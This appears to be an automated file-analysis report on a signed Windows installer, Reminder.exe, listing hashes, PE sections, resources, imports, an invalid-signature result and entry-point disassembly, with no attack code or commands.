        Entropy (8bit):4.9404427828211634
        Encrypted:false
        SSDEEP:
        MD5:1D785D889CA617298A68D26DFEF974C4
        SHA1:1CC36474033E2767B059019B12782CE558F1EA34
        SHA-256:FE52FE8317F9F07F4AB830F6E3B1F1013BE4AA2A82DD5C86AA805648FC053230
        SHA-512:EF34C2479BE5BA45B41584887354DE53EA15EC53EA74D57042FF57EB8A609B93DAC9A55297300C29320CE14966FB7704C9952BDC7C6E2DDD0DCA929884091CF3
        Malicious:false
        Reputation:unknown
        Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.965829564509541
        TrID:
        • Win32 Executable (generic) a (10002005/4) 98.19%
        • Inno Setup installer (109748/4) 1.08%
        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
        • Win16/32 Executable Delphi generic (2074/23) 0.02%
        File name:Reminder.exe
        File size:10'161'880 bytes
        MD5:d743bb6502147d38addb430590bc7a98
        SHA1:16cd70dd31fc54c0e42695441dbf3eab5de2e2bd
        SHA256:ebe565a1a2b13e3cbcf7bcc58ea8bee81bd1ed2fed0e5977dc9e108ee8cbae95
        SHA512:b6b61e445e59f3431414a8c664ed5686d79cb01fd50e7442c869f6c94f4f4183f980de2827f1ddf70817a4dd08661281e1d050ace81c5c5b50b7dbf7a073a735
        SSDEEP:196608:F/UI+mNZKDKmDX7HPY58yZqLcbUm4CzknrnbELh19M8pjx6gO0EMTe:F8HV7YqyZqLwqqk3E39npjZO0Eme
        TLSH:72A62322B3C7E43EE06D0B3706B3B65859FBAB51A922BE5396E484ACCF150501D3E357
        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
        Icon Hash:6c6aeee6c14cdc4c
        Entrypoint:0x4a83bc
        Entrypoint Section:.itext
        Digitally signed:true
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:1
        File Version Major:6
        File Version Minor:1
        Subsystem Version Major:6
        Subsystem Version Minor:1
        Import Hash:40ab50289f7ef5fae60801f88d4541fc
        Signature Valid:false
        Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
        Signature Validation Error:The digital signature of the object did not verify
        Error Number:-2146869232
        Not Before, Not After
        • 24/06/2022 09:22:08 14/04/2025 16:06:58
        Subject Chain
        • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
        Version:3
        Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
        Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
        Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
        Serial:115BBE9E1C286827AF66E7A01390C206
        Instruction
        push ebp
        mov ebp, esp
        add esp, FFFFFFA4h
        push ebx
        push esi
        push edi
        xor eax, eax
        mov dword ptr [ebp-3Ch], eax
        mov dword ptr [ebp-40h], eax
        mov dword ptr [ebp-5Ch], eax
        mov dword ptr [ebp-30h], eax
        mov dword ptr [ebp-38h], eax
        mov dword ptr [ebp-34h], eax
        mov dword ptr [ebp-2Ch], eax
        mov dword ptr [ebp-28h], eax
        mov dword ptr [ebp-14h], eax
        mov eax, 004A2EBCh
        call 00007FC2E44B1CF5h
        xor eax, eax
        push ebp
        push 004A8AC1h
        push dword ptr fs:[eax]
        mov dword ptr fs:[eax], esp
        xor edx, edx
        push ebp
        push 004A8A7Bh
        push dword ptr fs:[edx]
        mov dword ptr fs:[edx], esp
        mov eax, dword ptr [004B0634h]
        call 00007FC2E454367Bh
        call 00007FC2E45431CEh
        lea edx, dword ptr [ebp-14h]
        xor eax, eax
        call 00007FC2E453DEA8h
        mov edx, dword ptr [ebp-14h]
        mov eax, 004B41F4h
        call 00007FC2E44ABDA3h
        push 00000002h
        push 00000000h
        push 00000001h
        mov ecx, dword ptr [004B41F4h]
        mov dl, 01h
        mov eax, dword ptr [0049CD14h]
        call 00007FC2E453F1D3h
        mov dword ptr [004B41F8h], eax
        xor edx, edx
        push ebp
        push 004A8A27h
        push dword ptr fs:[edx]
        mov dword ptr fs:[edx], esp
        call 00007FC2E4543703h
        mov dword ptr [004B4200h], eax
        mov eax, dword ptr [004B4200h]
        cmp dword ptr [eax+0Ch], 01h
        jne 00007FC2E454A3EAh
        mov eax, dword ptr [004B4200h]
        mov edx, 00000028h
        call 00007FC2E453FAC8h
        mov edx, dword ptr [004B4200h]
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
        IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000xe610.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x9aea000x24d8
        IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        .rsrc0xcb0000xe6100xe8005f36adece46ffbc3b5e8abb618d8b9beFalse0.6631869612068966data6.853948165376388IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0xcb4c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.599290780141844
        RT_ICON0xcb9300x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.38410746812386154
        RT_ICON0xcca580x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.29302278275020344
        RT_ICON0xcf0c00x7407PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9937716728949938
        RT_STRING0xd64c80x3f8data0.3198818897637795
        RT_STRING0xd68c00x2dcdata0.36475409836065575
        RT_STRING0xd6b9c0x430data0.40578358208955223
        RT_STRING0xd6fcc0x44cdata0.38636363636363635
        RT_STRING0xd74180x2d4data0.39226519337016574
        RT_STRING0xd76ec0xb8data0.6467391304347826
        RT_STRING0xd77a40x9cdata0.6410256410256411
        RT_STRING0xd78400x374data0.4230769230769231
        RT_STRING0xd7bb40x398data0.3358695652173913
        RT_STRING0xd7f4c0x368data0.3795871559633027
        RT_STRING0xd82b40x2a4data0.4275147928994083
        RT_RCDATA0xd85580x10data1.5
        RT_RCDATA0xd85680x310data0.6173469387755102
        RT_RCDATA0xd88780x2cdata1.2045454545454546
        RT_GROUP_ICON0xd88a40x3edataEnglishUnited States0.8709677419354839
        RT_VERSION0xd88e40x584dataEnglishUnited States0.28895184135977336
        RT_MANIFEST0xd8e680x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
        DLLImport
        kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
        comctl32.dllInitCommonControls
        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
        advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
        NameOrdinalAddress
        __dbk_fcall_wrapper20x40fc10
        dbkFCallWrapperAddr10x4b063c
        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States